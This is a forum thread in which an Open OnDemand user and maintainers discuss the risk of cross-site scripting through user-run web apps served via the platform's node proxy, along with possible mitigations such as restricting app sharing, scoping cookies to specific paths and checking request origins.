Preventing a JS Attack?

Inspired by this issue, I’ve been thinking about OnDemand’s security measures. Specifically I’m worried about a scenario where a malicious or compromised user who has access to OnDemand starts any web server with user-defined content. For example, this might be a Python or R Shiny web server. This server will be accessible to anyone who is logged into OnDemand via a link such as https://ondemand.my_center.edu/rnode/node02.my_center.edu/5000/index.html. Then, the malicious JavaScript served by this HTML page could make authenticated requests to the OnDemand API, in much the same way as the files dashboard uses API requests to move/edit/delete files. This would give the attacker full control over any user’s files, as long as they have authenticated with OnDemand and then clicked on a URL, which is a very low threshold.

This was already discussed in the context of the HTML content serving behaviour that OnDemand previously had (see the link above), but this isn’t the only way for OnDemand to serve user content, hence my concern.

Does OnDemand have any security measures to prevent this happening?

Not really, other than disabling user sharing.

That link came from an app. Let’s say it’s actually good (i.e., not malicious) like Rstudio. Rstudio’s going to server up some javascript that is required for the app, so we have to forward that - otherwise it’s basically useless.

Now there could be a scheme where an app generated a link where 1 and only 1 user can access that link. This is something I’d like to move to, but requires a very large overhaul of how we currently proxy. But even then, the app could be malicious. That’s where user sharing comes in. If you only expose apps that the system administrator installed (i.e., a trusted source) then you can mitigate that. But if you’ve enabled any user to share any app, well then, you have to trust all those users.

I think in general - you just don’t want to click links that people give you. Always click the button in the OnDemand interface and you’ll get routed to your app that was provided by the system administrator.

Just wanted to add in we are always open to ideas / suggestions. Fundamentally there are a TON of potential attack vectors on a typical research computing system because clients inherently expect to be able to collaborate with other people in their group and move data around and run software / scripts they personally haven’t developed.

Since Open OnDemand relies almost entirely on the underlying system operating system for most security stuff, a lot of these types of issues are present regardless of whether OOD is installed or not. For example, lots of sites run JupyterLab standalone. Someone could easily provide a malicious Python script that people inadvertently execute that moves/edits/deletes files.

Okay so it turns out I’m describing an XSS attack.

Could we restrict the OnDemand cookie domains? For example, when you login to OnDemand I believe it sets cookies with Path=/ meaning that they can be used anywhere within ondemand.example.edu.au. If we granted different cookies to the node proxy urls (ondemand.example.edu.au/rnode) and the dashboard (ondemand.example.edu.au/pun/sys/dashboard/files) so that the interactive apps couldn’t use the privileged OnDemand cookies, this would avoid the issue from our end.

Alternatively, could the “dangerous” OnDemand backend APIs such as the file manipulation ones enforce that the origin of the request is the dashboard and not an interactive app?

Now there could be a scheme where an app generated a link where 1 and only 1 user can access that link. This is something I’d like to move to, but requires a very large overhaul of how we currently proxy.

This would also work, but limiting the sharing might break some use cases.

Since Open OnDemand relies almost entirely on the underlying system operating system for most security stuff, a lot of these types of issues are present regardless of whether OOD is installed or not. For example, lots of sites run JupyterLab standalone. Someone could easily provide a malicious Python script that people inadvertently execute that moves/edits/deletes files.

I take your point, but I’m a bit less worried about these use cases. The reason being, whenever someone runs a script or Python notebook, the user is (or should be) aware that they’re running some code and like any code it could be destructive. The issue I’m raising here is to do with XSS which can happen without the user actively executing anything, because the browser will automatically fire off these requests as soon as you hit the page. I think that people are less cautious about visiting a web page because it’s not generally as dangerous.